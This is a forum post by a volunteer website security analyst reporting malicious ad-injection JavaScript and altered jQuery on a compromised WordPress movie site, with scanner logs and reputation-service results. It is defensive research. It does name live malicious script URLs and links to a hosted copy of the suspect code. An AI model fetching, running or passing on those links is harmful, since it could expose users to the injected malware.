L.S.
What code and where we stumbled upon it? → third party code integrity - htbridge scan alerts
Attackers often hide backdoors, crypto jacking malware and other malicious code inside of legitimate third-party JS (various libraries and frameworks). We check if a particular version of the third-party JS code was altered with a new code, and report any anomalies here.
-http://www.watchonlinemovies.pk/wp-content/cache/minify/115b0.js
The JS seems to differ the original code. Altered integrity may indicate a compromise.
The following JS component were found inside:
- jQuery [1.12.4]
and via an unpacker error:
wXw.watchonlinemovies.pk/wp-content/cache/minify/115b0.js
status: (referer=XXX/web?q=xxx)saved 118689 bytes 055e2b734ec4d2ede0c5ef8003510140a602ebf4
info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
info: [decodingLevel=0] found JavaScript
error: undefined variable n
file: 055e2b734ec4d2ede0c5ef8003510140a602ebf4: 118689 bytes
Consider: http://www.domxssscanner.com/scan?url=http://www.watchonlinemovies.pk/wp-content/cache/minify/115b0.js
going to -https://ads.exosrv.com/ads.js and/or -https://ads.exosrv.com/popunder1000.js
both blocked accorsding to Peter Lowe’s Ad and tracking server list by uBlock Origin’s.
Site has outdated CMS WordPress, using WordPress version from source: 4.9.5,
site has malware detected, site is blacklisted…
Malware (12 instances detected) = http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1 e.g. Various malicious injections that result in displaying ads (or opening pop-up or pop-under windows)without site owner’s consent. Such injections may utilize scripts from legitimate ad networks. We had the pop-under1000.js found blocked here.
Also detected: labs.sucuri.net/db/malware/malware-entry-mwblk2 → The web site contains a remote javascript or iframe that is currently blacklisted. That can be used to infect visitors of your own web site and generate cross-site warnings. If you don’t have access to the remote site, remove the link (or iframe or javascript) from your site pointing to it. This based on web rep verification. Info credits Sucuri Reasearch Scan Results & .htbridge.com WebScan results.
polonus (volunteer website security analyst and website error-hunter)
Checked the code uri at VT and only Fortinet’s to alert as suspicious: https://www.virustotal.com/nl/url/62fefc7a356ffabf9bff21201890c883d531ca0bbffd713ca993bc162618de85/analysis/1531403940/ Nothing on file detection: https://www.virustotal.com/nl/file/7ae9066cdeb227cb26d41ab6fc3404c373b7b3edc33773e3e2e75992ba29b216/analysis/1510180615/
I created a plunker for that suspicious code to analyze it better,
just for researchers only, normally do not visit link.
See: http://plnkr.co/edit/W5GDM0JU0nq4bHl7cxKV?p=preview
Open up the embedded view (for security research only) here: http://embed.plnkr.co/W5GDM0JU0nq4bHl7cxKV/
AdRemover 8.5 has finished it’s work! [296 ms]
Syntax error @ “Translate_This”!
Syntax error @ “FireHol Fossies”!
Syntax error @ “Bro IDS”!
Syntax error @ “Secure.js”!
Syntax error @ “DNS Rebinding Protection Script”!
Starting AdRemover 8.5 on -http://run.plnkr.co/preview/cjjilwbgv0005395snrc3tstm/ 4 seconds after page load …
Run: -http://run.plnkr.co/preview/cjjilwbgv0005395snrc3tstm/ (for security research only).
When running in a javascript unpacker google chrome browser prevent this. Something phishy out there for sure.
As Sucuri’s detects malcode → https://sitecheck.sucuri.net/results/www.watchonlinemovies.pk
Also Quttera’s detects - https://quttera.com/detailed_report/www.watchonlinemovies.pk
46 instances of detected malicious inserted JavaScript code.
polonus (volunteer website security analyst and website error–hunter)
Code errors from what Sucuri’s flags:
wXw.watchonlinemovies.pk/wp-content/themes/dramatvpk/js/ie6PngFix.js
status: (referer=XXX/web?q=puppies)saved 11010 bytes 4951b40a8c748b1e0953680de5b1b77d78618e64
info: [decodingLevel=0] found JavaScript
error: undefined variable document.documentElement.firstChild
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var document.documentElement.firstChild = 1;
error: line:1: ....^
info: [element] URL=wXw.watchonlinemovies.pk/wp-content/themes/dramatvpk/js/undefined
info: [1] no JavaScript
file: 4951b40a8c748b1e0953680de5b1b77d78618e64: 11010 bytes
file: 13532b7da4041b6f071fa13e0d5fbc64ccfa6e40: 74 bytes
&
info: [script] go.oclasrv.com/apu.php?zoneid=1391279
info: [decodingLevel=0] found JavaScript
error: line:3: SyntaxError: missing = in XML attribute:
error: line:3: ]
error: line:3: .................................................................................^
See: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=www.watchonlinemovies.pk%2Fwp-content%2Fthemes%2Fdramatvpk%2Fjs%2Fie6PngFix.js&ref_sel=GSP2&ua_sel=ff&fs=1
pol